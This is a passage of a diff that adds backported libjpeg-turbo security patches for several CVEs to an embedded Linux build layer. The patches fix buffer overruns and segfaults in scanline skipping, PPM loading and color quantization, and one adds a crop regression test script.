450- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
451+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
452 register int y, cred, cgreen, cblue;
453 int cb, cr;
454 register JSAMPROW outptr0, outptr1;
455--
4562.25.1
457
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
new file mode 100644
index 0000000000..f86175dff0
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
@@ -0,0 +1,400 @@
1From a46c111d9f3642f0ef3819e7298846ccc61869e0 Mon Sep 17 00:00:00 2001
2From: DRC <information@libjpeg-turbo.org>
3Date: Mon, 27 Jul 2020 14:21:23 -0500
4Subject: [PATCH] Further jpeg_skip_scanlines() fixes
5
6- Introduce a partial image decompression regression test script that
7 validates the correctness of jpeg_skip_scanlines() and
8 jpeg_crop_scanlines() for a variety of cropping regions and libjpeg
9 settings.
10
11 This regression test catches the following issues:
12 #182, fixed in 5bc43c7
13 #237, fixed in 6e95c08
14 #244, fixed in 398c1e9
15 #441, fully fixed in this commit
16
17 It does not catch the following issues:
18 #194, fixed in 773040f
19 #244 (additional segfault), fixed in
20 9120a24
21
22- Modify the libjpeg-turbo regression test suite (make test) so that it
23 checks for the issue reported in #441 (segfault in
24 jpeg_skip_scanlines() when used with 4:2:0 merged upsampling/color
25 conversion.)
26
27- Fix issues in jpeg_skip_scanlines() that caused incorrect output with
28 h2v2 (4:2:0) merged upsampling/color conversion. The previous commit
29 fixed the segfault reported in #441, but that was a symptom of a
30 larger problem. Because merged 4:2:0 upsampling uses a "spare row"
31 buffer, it is necessary to allow the upsampler to run when skipping
32 rows (fancy 4:2:0 upsampling, which uses context rows, also requires
33 this.) Otherwise, if skipping starts at an odd-numbered row, the
34 output image will be incorrect.
35
36- Throw an error if jpeg_skip_scanlines() is called with two-pass color
37 quantization enabled. With two-pass color quantization, the first
38 pass occurs within jpeg_start_decompress(), so subsequent calls to
39 jpeg_skip_scanlines() interfere with the multipass state and prevent
40 the second pass from occurring during subsequent calls to
41 jpeg_read_scanlines().
42
43Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/a46c111d9f3642f0ef3819e7298846ccc61869e0]
44CVE: CVE-2020-35538
45Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
46---
47 CMakeLists.txt | 9 +++--
48 ChangeLog.md | 15 +++++---
49 croptest.in | 95 ++++++++++++++++++++++++++++++++++++++++++++++++++
50 jdapistd.c | 70 +++++++++++--------------------------
51 libjpeg.txt | 6 ++--
52 5 files changed, 136 insertions(+), 59 deletions(-)
53 create mode 100755 croptest.in
54
55diff --git a/CMakeLists.txt b/CMakeLists.txt
56index aee74c9..de451f4 100644
57--- a/CMakeLists.txt
58+++ b/CMakeLists.txt
59@@ -753,7 +753,7 @@ else()
60 set(MD5_PPM_3x2_IFAST fd283664b3b49127984af0a7f118fccd)
61 set(MD5_JPEG_420_ISLOW_ARI e986fb0a637a8d833d96e8a6d6d84ea1)
62 set(MD5_JPEG_444_ISLOW_PROGARI 0a8f1c8f66e113c3cf635df0a475a617)
63- set(MD5_PPM_420M_IFAST_ARI 72b59a99bcf1de24c5b27d151bde2437)
64+ set(MD5_PPM_420M_IFAST_ARI 57251da28a35b46eecb7177d82d10e0e)
65 set(MD5_JPEG_420_ISLOW 9a68f56bc76e466aa7e52f415d0f4a5f)
66 set(MD5_PPM_420M_ISLOW_2_1 9f9de8c0612f8d06869b960b05abf9c9)
67 set(MD5_PPM_420M_ISLOW_15_8 b6875bc070720b899566cc06459b63b7)
68@@ -1131,7 +1131,7 @@ foreach(libtype ${TEST_LIBTYPES})
69
70 if(WITH_ARITH_DEC)
71 # CC: RGB->YCC SAMP: h2v2 merged IDCT: ifast ENT: arith
72- add_bittest(djpeg 420m-ifast-ari "-fast;-ppm"
73+ add_bittest(djpeg 420m-ifast-ari "-fast;-skip;1,20;-ppm"
74 testout_420m_ifast_ari.ppm ${TESTIMAGES}/testimgari.jpg
75 ${MD5_PPM_420M_IFAST_ARI})
76
77@@ -1266,6 +1266,11 @@ endforeach()
78 add_custom_target(testclean COMMAND ${CMAKE_COMMAND} -P
79 ${CMAKE_CURRENT_SOURCE_DIR}/cmakescripts/testclean.cmake)
80
81+configure_file(croptest.in croptest @ONLY)
82+add_custom_target(croptest
83+ COMMAND echo croptest
84+ COMMAND ${BASH} ${CMAKE_CURRENT_BINARY_DIR}/croptest)
85+
86 if(WITH_TURBOJPEG)
87 configure_file(tjbenchtest.in tjbenchtest @ONLY)
88 configure_file(tjexampletest.in tjexampletest @ONLY)
89diff --git a/ChangeLog.md b/ChangeLog.md
90index 19d18fa..4562eff 100644
91--- a/ChangeLog.md
92+++ b/ChangeLog.md
93@@ -54,11 +54,16 @@ a 16-bit binary PGM file into an RGB image buffer.
94 generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
95 file into an extended RGB image buffer.
96
97-2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
98-in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
99-images using the merged (non-fancy) upsampling algorithms (that is, when
100-setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a similar fix,
101-but it did not cover all cases.
102+2. Fixed or worked around multiple issues with `jpeg_skip_scanlines()`:
103+
104+ - Fixed segfaults or "Corrupt JPEG data: premature end of data segment"
105+errors in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or
106+4:2:0 JPEG images using merged (non-fancy) upsampling/color conversion (that
107+is, when setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a
108+similar fix, but it did not cover all cases.
109+ - `jpeg_skip_scanlines()` now throws an error if two-pass color
110+quantization is enabled. Two-pass color quantization never worked properly
111+with `jpeg_skip_scanlines()`, and the issues could not readily be fixed.
112
113
114 2.0.3
115diff --git a/croptest.in b/croptest.in
116new file mode 100755
117index 0000000..7e3c293
118--- /dev/null
119+++ b/croptest.in
120@@ -0,0 +1,95 @@
121+#!/bin/bash
122+
123+set -u
124+set -e
125+trap onexit INT
126+trap onexit TERM
127+trap onexit EXIT
128+
129+onexit()
130+{
131+ if [ -d $OUTDIR ]; then
132+ rm -rf $OUTDIR
133+ fi
134+}
135+
136+runme()
137+{
138+ echo \*\*\* $*
139+ $*
140+}
141+
142+IMAGE=vgl_6548_0026a.bmp
143+WIDTH=128
144+HEIGHT=95
145+IMGDIR=@CMAKE_CURRENT_SOURCE_DIR@/testimages
146+OUTDIR=`mktemp -d /tmp/__croptest_output.XXXXXX`
147+EXEDIR=@CMAKE_CURRENT_BINARY_DIR@
148+
149+if [ -d $OUTDIR ]; then
150+ rm -rf $OUTDIR
151+fi
152+mkdir -p $OUTDIR
153+
154+exec >$EXEDIR/croptest.log
155+
156+echo "============================================================"
157+echo "$IMAGE ($WIDTH x $HEIGHT)"
158+echo "============================================================"
159+echo
160+
161+for PROGARG in "" -progressive; do
162+
163+ cp $IMGDIR/$IMAGE $OUTDIR
164+ basename=`basename $IMAGE .bmp`
165+ echo "------------------------------------------------------------"
166+ echo "Generating test images"
167+ echo "------------------------------------------------------------"
168+ echo
169+ runme $EXEDIR/cjpeg $PROGARG -grayscale -outfile $OUTDIR/${basename}_GRAY.jpg $IMGDIR/${basename}.bmp
170+ runme $EXEDIR/cjpeg $PROGARG -sample 2x2 -outfile $OUTDIR/${basename}_420.jpg $IMGDIR/${basename}.bmp
171+ runme $EXEDIR/cjpeg $PROGARG -sample 2x1 -outfile $OUTDIR/${basename}_422.jpg $IMGDIR/${basename}.bmp
172+ runme $EXEDIR/cjpeg $PROGARG -sample 1x2 -outfile $OUTDIR/${basename}_440.jpg $IMGDIR/${basename}.bmp
173+ runme $EXEDIR/cjpeg $PROGARG -sample 1x1 -outfile $OUTDIR/${basename}_444.jpg $IMGDIR/${basename}.bmp
174+ echo
175+
176+ for NSARG in "" -nosmooth; do
177+
178+ for COLORSARG in "" "-colors 256 -dither none -onepass"; do
179+
180+ for Y in {0..16}; do
181+
182+ for H in {1..16}; do
183+
184+ X=$(( (Y*16)%128 ))
185+ W=$(( WIDTH-X-7 ))
186+ if [ $Y -le 15 ]; then
187+ CROPSPEC="${W}x${H}+${X}+${Y}"
188+ else
189+ Y2=$(( HEIGHT-H ));
190+ CROPSPEC="${W}x${H}+${X}+${Y2}"
191+ fi
192+
193+ echo "------------------------------------------------------------"
194+ echo $PROGARG $NSARG $COLORSARG -crop $CROPSPEC
195+ echo "------------------------------------------------------------"
196+ echo
197+ for samp in GRAY 420 422 440 444; do
198+ $EXEDIR/djpeg $NSARG $COLORSARG -rgb -outfile $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}.jpg
199+ convert -crop $CROPSPEC $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}_ref.ppm
200+ runme $EXEDIR/djpeg $NSARG $COLORSARG -crop $CROPSPEC -rgb -outfile $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}.jpg
201+ runme cmp $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}_ref.ppm
202+ done
203+ echo
204+
205+ done
206+
207+ done
208+
209+ done
210+
211+ done
212+
213+done
214+
215+echo SUCCESS!
216diff --git a/jdapistd.c b/jdapistd.c
217index 91da642..c502909 100644
218--- a/jdapistd.c
219+++ b/jdapistd.c
220@@ -306,16 +306,6 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
221 }
222
223
224-/* Dummy postprocessing function used by jpeg_skip_scanlines() */
225-LOCAL(void)
226-noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
227- JDIMENSION *in_row_group_ctr,
228- JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
229- JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
230-{
231-}
232-
233-
234 /*
235 * In some cases, it is best to call jpeg_read_scanlines() and discard the
236 * output, rather than skipping the scanlines, because this allows us to
237@@ -329,16 +319,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
238 {
239 JDIMENSION n;
240 my_master_ptr master = (my_master_ptr)cinfo->master;
241+ JSAMPARRAY scanlines = NULL;
242 void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
243 JDIMENSION input_row, JSAMPARRAY output_buf,
244 int num_rows) = NULL;
245 void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
246 JSAMPARRAY output_buf, int num_rows) = NULL;
247- void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
248- JDIMENSION *in_row_group_ctr,
249- JDIMENSION in_row_groups_avail,
250- JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
251- JDIMENSION out_rows_avail) = NULL;
252
253 if (cinfo->cconvert && cinfo->cconvert->color_convert) {
254 color_convert = cinfo->cconvert->color_convert;
255@@ -350,23 +336,19 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
256 cinfo->cquantize->color_quantize = noop_quantize;
257 }
258
259- if (master->using_merged_upsample && cinfo->post &&
260- cinfo->post->post_process_data) {
261- post_process_data = cinfo->post->post_process_data;
262- cinfo->post->post_process_data = noop_post_process;
263+ if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
264+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
265+ scanlines = &upsample->spare_row;
266 }
267
268 for (n = 0; n < num_lines; n++)
269- jpeg_read_scanlines(cinfo, NULL, 1);
270+ jpeg_read_scanlines(cinfo, scanlines, 1);
271
272 if (color_convert)
273 cinfo->cconvert->color_convert = color_convert;
274
275 if (color_quantize)
276 cinfo->cquantize->color_quantize = color_quantize;
277-
278- if (post_process_data)
279- cinfo->post->post_process_data = post_process_data;
280 }
281
282
283@@ -380,6 +362,12 @@ increment_simple_rowgroup_ctr(j_decompress_ptr cinfo, JDIMENSION rows)
284 {
285 JDIMENSION rows_left;
286 my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
287+ my_master_ptr master = (my_master_ptr)cinfo->master;
288+
289+ if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
290+ read_and_discard_scanlines(cinfo, rows);
291+ return;
292+ }
293
294 /* Increment the counter to the next row group after the skipped rows. */
295 main_ptr->rowgroup_ctr += rows / cinfo->max_v_samp_factor;
296@@ -410,11 +398,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
297 my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
298 my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
299 my_master_ptr master = (my_master_ptr)cinfo->master;
300+ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
301 JDIMENSION i, x;
302 int y;
303 JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
304 JDIMENSION lines_to_skip, lines_to_read;
305
306+ /* Two-pass color quantization is not supported. */
307+ if (cinfo->quantize_colors && cinfo->two_pass_quantize)
308+ ERREXIT(cinfo, JERR_NOTIMPL);
309+
310 if (cinfo->global_state != DSTATE_SCANNING)
311 ERREXIT1(cinfo, JERR_BAD_STATE, cinfo->global_state);
312
313@@ -472,13 +465,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
314 main_ptr->buffer_full = FALSE;
315 main_ptr->rowgroup_ctr = 0;
316 main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
317- if (master->using_merged_upsample) {
318- my_merged_upsample_ptr upsample =
319- (my_merged_upsample_ptr)cinfo->upsample;
320- upsample->spare_full = FALSE;
321- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
322- } else {
323- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
324+ if (!master->using_merged_upsample) {
325 upsample->next_row_out = cinfo->max_v_samp_factor;
326 upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
327 }
328@@ -493,13 +480,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
329 cinfo->output_scanline += lines_left_in_iMCU_row;
330 main_ptr->buffer_full = FALSE;
331 main_ptr->rowgroup_ctr = 0;
332- if (master->using_merged_upsample) {
333- my_merged_upsample_ptr upsample =
334- (my_merged_upsample_ptr)cinfo->upsample;
335- upsample->spare_full = FALSE;
336- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
337- } else {
338- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
339+ if (!master->using_merged_upsample) {
340 upsample->next_row_out = cinfo->max_v_samp_factor;
341 upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
342 }
343@@ -537,14 +518,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
344 cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
345 increment_simple_rowgroup_ctr(cinfo, lines_to_read);
346 }
347- if (master->using_merged_upsample) {
348- my_merged_upsample_ptr upsample =
349- (my_merged_upsample_ptr)cinfo->upsample;
350- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
351- } else {
352- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
353+ if (!master->using_merged_upsample)
354 upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
355- }
356 return num_lines;
357 }
358
359@@ -585,13 +560,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
360 * bit odd, since "rows_to_go" seems to be redundantly keeping track of
361 * output_scanline.
362 */
363- if (master->using_merged_upsample) {
364- my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
365+ if (!master->using_merged_upsample)
366 upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
367- } else {
368- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
369- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
370- }
371
372 /* Always skip the requested number of lines. */
373 return num_lines;
374diff --git a/libjpeg.txt b/libjpeg.txt
375index c50cf90..c233ecb 100644
376--- a/libjpeg.txt
377+++ b/libjpeg.txt
378@@ -3,7 +3,7 @@ USING THE IJG JPEG LIBRARY
379 This file was part of the Independent JPEG Group's software:
380 Copyright (C) 1994-2013, Thomas G. Lane, Guido Vollbeding.
381 libjpeg-turbo Modifications:
382-Copyright (C) 2010, 2014-2018, D. R. Commander.
383+Copyright (C) 2010, 2014-2018, 2020, D. R. Commander.
384 Copyright (C) 2015, Google, Inc.
385 For conditions of distribution and use, see the accompanying README.ijg file.
386
387@@ -750,7 +750,9 @@ multiple rows in the JPEG image.
388
389 Suspending data sources are not supported by this function. Calling
390 jpeg_skip_scanlines() with a suspending data source will result in undefined
391-behavior.
392+behavior. Two-pass color quantization is also not supported by this function.
393+Calling jpeg_skip_scanlines() with two-pass color quantization enabled will
394+result in an error.
395
396 jpeg_skip_scanlines() will not allow skipping past the bottom of the image. If
397 the value of num_lines is large enough to skip past the bottom of the image,
398--
3992.25.1
400
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
new file mode 100644
index 0000000000..68cf89e628
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
@@ -0,0 +1,133 @@
1From f35fd27ec641c42d6b115bfa595e483ec58188d2 Mon Sep 17 00:00:00 2001
2From: DRC <information@libjpeg-turbo.org>
3Date: Tue, 6 Apr 2021 12:51:03 -0500
4Subject: [PATCH] tjLoadImage: Fix issues w/loading 16-bit PPMs/PGMs
5
6- The PPM reader now throws an error rather than segfaulting (due to a
7 buffer overrun) if an application attempts to load a 16-bit PPM file
8 into a grayscale uncompressed image buffer. No known applications
9 allowed that (not even the test applications in libjpeg-turbo),
10 because that mode of operation was never expected to work and did not
11 work under any circumstances. (In fact, it was necessary to modify
12 TJBench in order to reproduce the issue outside of a fuzzing
13 environment.) This was purely a matter of making the library bow out
14 gracefully rather than crash if an application tries to do something
15 really stupid.
16
17- The PPM reader now throws an error rather than generating incorrect
18 pixels if an application attempts to load a 16-bit PGM file into an
19 RGB uncompressed image buffer.
20
21- The PPM reader now correctly loads 16-bit PPM files into extended
22 RGB uncompressed image buffers. (Previously it generated incorrect
23 pixels unless the input colorspace was JCS_RGB or JCS_EXT_RGB.)
24
25The only way that users could have potentially encountered these issues
26was through the tjLoadImage() function. cjpeg and TJBench were
27unaffected.
28
29CVE: CVE-2021-46822
30Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/f35fd27ec641c42d6b115bfa595e483ec58188d2.patch]
31Comment: Refreshed hunks from ChangeLog.md
32 Refreshed hunks from rdppm.c
33
34Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
35
36---
37 ChangeLog.md | 10 ++++++++++
38 rdppm.c | 26 ++++++++++++++++++++------
39 2 files changed, 30 insertions(+), 6 deletions(-)
40
41diff --git a/ChangeLog.md b/ChangeLog.md
42index 968969c6b..12e730a0e 100644
43--- a/ChangeLog.md
44+++ b/ChangeLog.md
45@@ -44,6 +44,15 @@
46 that maximum value was less than 255. libjpeg-turbo 1.5.0 already included a
47 similar fix for binary PPM/PGM files with maximum values greater than 255.
48
49+7. The PPM reader now throws an error, rather than segfaulting (due to a buffer
50+overrun) or generating incorrect pixels, if an application attempts to use the
51+`tjLoadImage()` function to load a 16-bit binary PPM file (a binary PPM file
52+with a maximum value greater than 255) into a grayscale image buffer or to load
53+a 16-bit binary PGM file into an RGB image buffer.
54+
55+8. Fixed an issue in the PPM reader that caused incorrect pixels to be
56+generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
57+file into an extended RGB image buffer.
58
59 2.0.3
60 =====
61diff --git a/rdppm.c b/rdppm.c
62index c4c937e8a..6ac8fdbf7 100644
63--- a/rdppm.c
64+++ b/rdppm.c
65@@ -5,7 +5,7 @@
66 * Copyright (C) 1991-1997, Thomas G. Lane.
67 * Modified 2009 by Bill Allombert, Guido Vollbeding.
68 * libjpeg-turbo Modifications:
69- * Copyright (C) 2015-2017, 2020, D. R. Commander.
70+ * Copyright (C) 2015-2017, 2020-2021, D. R. Commander.
71 * For conditions of distribution and use, see the accompanying README.ijg
72 * file.
73 *
74@@ -516,6 +516,11 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
75 register JSAMPLE *rescale = source->rescale;
76 JDIMENSION col;
77 unsigned int maxval = source->maxval;
78+ register int rindex = rgb_red[cinfo->in_color_space];
79+ register int gindex = rgb_green[cinfo->in_color_space];
80+ register int bindex = rgb_blue[cinfo->in_color_space];
81+ register int aindex = alpha_index[cinfo->in_color_space];
82+ register int ps = rgb_pixelsize[cinfo->in_color_space];
83
84 if (!ReadOK(source->pub.input_file, source->iobuffer, source->buffer_width))
85 ERREXIT(cinfo, JERR_INPUT_EOF);
86@@ -527,17 +532,20 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
87 temp |= UCH(*bufferptr++);
88 if (temp > maxval)
89 ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
90- *ptr++ = rescale[temp];
91+ ptr[rindex] = rescale[temp];
92 temp = UCH(*bufferptr++) << 8;
93 temp |= UCH(*bufferptr++);
94 if (temp > maxval)
95 ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
96- *ptr++ = rescale[temp];
97+ ptr[gindex] = rescale[temp];
98 temp = UCH(*bufferptr++) << 8;
99 temp |= UCH(*bufferptr++);
100 if (temp > maxval)
101 ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
102- *ptr++ = rescale[temp];
103+ ptr[bindex] = rescale[temp];
104+ if (aindex >= 0)
105+ ptr[aindex] = 0xFF;
106+ ptr += ps;
107 }
108 return 1;
109 }
110@@ -624,7 +632,10 @@ start_input_ppm(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
111 cinfo->in_color_space = JCS_GRAYSCALE;
112 TRACEMS2(cinfo, 1, JTRC_PGM, w, h);
113 if (maxval > 255) {
114- source->pub.get_pixel_rows = get_word_gray_row;
115+ if (cinfo->in_color_space == JCS_GRAYSCALE)
116+ source->pub.get_pixel_rows = get_word_gray_row;
117+ else
118+ ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
119 } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
120 cinfo->in_color_space == JCS_GRAYSCALE) {
121 source->pub.get_pixel_rows = get_raw_row;
122@@ -657,7 +657,10 @@
123 cinfo->in_color_space = JCS_EXT_RGB;
124 TRACEMS2(cinfo, 1, JTRC_PPM, w, h);
125 if (maxval > 255) {
126- source->pub.get_pixel_rows = get_word_rgb_row;
127+ if (IsExtRGB(cinfo->in_color_space))
128+ source->pub.get_pixel_rows = get_word_rgb_row;
129+ else
130+ ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
131 } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
132 (cinfo->in_color_space == JCS_EXT_RGB
133 #if RGB_RED == 0 && RGB_GREEN == 1 && RGB_BLUE == 2 && RGB_PIXELSIZE == 3
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
new file mode 100644
index 0000000000..6668f6e41d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
@@ -0,0 +1,97 @@
1From 9679473547874c472569d54fecce32b463999a9d Mon Sep 17 00:00:00 2001
2From: DRC <information@libjpeg-turbo.org>
3Date: Tue, 4 Apr 2023 19:06:20 -0500
4Subject: [PATCH] Decomp: Don't enable 2-pass color quant w/ RGB565
5
6The 2-pass color quantization algorithm assumes 3-sample pixels. RGB565
7is the only 3-component colorspace that doesn't have 3-sample pixels, so
8we need to treat it as a special case when determining whether to enable
92-pass color quantization. Otherwise, attempting to initialize 2-pass
10color quantization with an RGB565 output buffer could cause
11prescan_quantize() to read from uninitialized memory and subsequently
12underflow/overflow the histogram array.
13
14djpeg is supposed to fail gracefully if both -rgb565 and -colors are
15specified, because none of its destination managers (image writers)
16support color quantization with RGB565. However, prescan_quantize() was
17called before that could occur. It is possible but very unlikely that
18these issues could have been reproduced in applications other than
19djpeg. The issues involve the use of two features (12-bit precision and
20RGB565) that are incompatible, and they also involve the use of two
21rarely-used legacy features (RGB565 and color quantization) that don't
22make much sense when combined.
23
24Fixes #668
25Fixes #671
26Fixes #680
27
28CVE: CVE-2023-2804
29Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9679473547874c472569d54fecce32b463999a9d]
30
31Signed-off-by: Peter Marko <peter.marko@siemens.com>
32---
33 ChangeLog.md | 6 ++++++
34 jdmaster.c | 5 +++--
35 jquant2.c | 5 +++--
36 3 files changed, 12 insertions(+), 4 deletions(-)
37
38diff --git a/ChangeLog.md b/ChangeLog.md
39index e605abe73..de0c4d0dd 100644
40--- a/ChangeLog.md
41+++ b/ChangeLog.md
42@@ -1,3 +1,9 @@ quality values.
43+9. Fixed an oversight in 1.4 beta1[8] that caused various segfaults and buffer
44+overruns when attempting to decompress various specially-crafted malformed
45+12-bit-per-component JPEG images using a 12-bit-per-component build of djpeg
46+(`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
47+enabled.
48+
49 2.0.4
50 =====
51
52diff --git a/jdmaster.c b/jdmaster.c
53index b20906438..8d8ef9956 100644
54--- a/jdmaster.c
55+++ b/jdmaster.c
56@@ -5,7 +5,7 @@
57 * Copyright (C) 1991-1997, Thomas G. Lane.
58 * Modified 2002-2009 by Guido Vollbeding.
59 * libjpeg-turbo Modifications:
60- * Copyright (C) 2009-2011, 2016, D. R. Commander.
61+ * Copyright (C) 2009-2011, 2016, 2023, D. R. Commander.
62 * Copyright (C) 2013, Linaro Limited.
63 * Copyright (C) 2015, Google, Inc.
64 * For conditions of distribution and use, see the accompanying README.ijg
65@@ -492,7 +492,8 @@ master_selection(j_decompress_ptr cinfo)
66 if (cinfo->raw_data_out)
67 ERREXIT(cinfo, JERR_NOTIMPL);
68 /* 2-pass quantizer only works in 3-component color space. */
69- if (cinfo->out_color_components != 3) {
70+ if (cinfo->out_color_components != 3 ||
71+ cinfo->out_color_space == JCS_RGB565) {
72 cinfo->enable_1pass_quant = TRUE;
73 cinfo->enable_external_quant = FALSE;
74 cinfo->enable_2pass_quant = FALSE;
75diff --git a/jquant2.c b/jquant2.c
76index 6570613bb..c760380fb 100644
77--- a/jquant2.c
78+++ b/jquant2.c
79@@ -4,7 +4,7 @@
80 * This file was part of the Independent JPEG Group's software:
81 * Copyright (C) 1991-1996, Thomas G. Lane.
82 * libjpeg-turbo Modifications:
83- * Copyright (C) 2009, 2014-2015, D. R. Commander.
84+ * Copyright (C) 2009, 2014-2015, 2020, 2023, D. R. Commander.
85 * For conditions of distribution and use, see the accompanying README.ijg
86 * file.
87 *
88@@ -1230,7 +1230,8 @@ jinit_2pass_quantizer(j_decompress_ptr cinfo)
89 cquantize->error_limiter = NULL;
90
91 /* Make sure jdmaster didn't give me a case I can't handle */
92- if (cinfo->out_color_components != 3)
93+ if (cinfo->out_color_components != 3 ||
94+ cinfo->out_color_space == JCS_RGB565)
95 ERREXIT(cinfo, JERR_NOTIMPL);
96
97 /* Allocate the histogram/inverse colormap storage */
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
new file mode 100644
index 0000000000..bcba0b513d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
@@ -0,0 +1,75 @@
1From 0deab87e24ab3106d5332205f829d1846fa65001 Mon Sep 17 00:00:00 2001
2From: DRC <information@libjpeg-turbo.org>
3Date: Thu, 6 Apr 2023 18:33:41 -0500
4Subject: [PATCH] jpeg_crop_scanline: Fix calc w/sclg + 2x4,4x2 samp
5
6When computing the downsampled width for a particular component,
7jpeg_crop_scanline() needs to take into account the fact that the
8libjpeg code uses a combination of IDCT scaling and upsampling to
9implement 4x2 and 2x4 upsampling with certain decompression scaling
10factors. Failing to account for that led to incomplete upsampling of
114x2- or 2x4-subsampled components, which caused the color converter to
12read from uninitialized memory. With 12-bit data precision, this caused
13a buffer overrun or underrun and subsequent segfault if the
14uninitialized memory contained a value that was outside of the valid
15sample range (because the color converter uses the value as an array
16index.)
17
18Fixes #669
19
20CVE: CVE-2023-2804
21Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/0deab87e24ab3106d5332205f829d1846fa65001]
22
23Signed-off-by: Peter Marko <peter.marko@siemens.com>
24---
25 ChangeLog.md | 8 ++++++++
26 jdapistd.c | 10 ++++++----
27 2 files changed, 14 insertions(+), 4 deletions(-)
28
29diff --git a/ChangeLog.md b/ChangeLog.md
30index de0c4d0dd..159bd1610 100644
31--- a/ChangeLog.md
32+++ b/ChangeLog.md
33@@ -4,6 +4,14 @@ overruns when attempting to decompress various specially-crafted malformed
34 (`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
35 enabled.
36
37+10. Fixed an issue whereby `jpeg_crop_scanline()` sometimes miscalculated the
38+downsampled width for components with 4x2 or 2x4 subsampling factors if
39+decompression scaling was enabled. This caused the components to be upsampled
40+incompletely, which caused the color converter to read from uninitialized
41+memory. With 12-bit data precision, this caused a buffer overrun or underrun
42+and subsequent segfault if the sample value read from unitialized memory was
43+outside of the valid sample range.
44+
45 2.0.4
46 =====
47
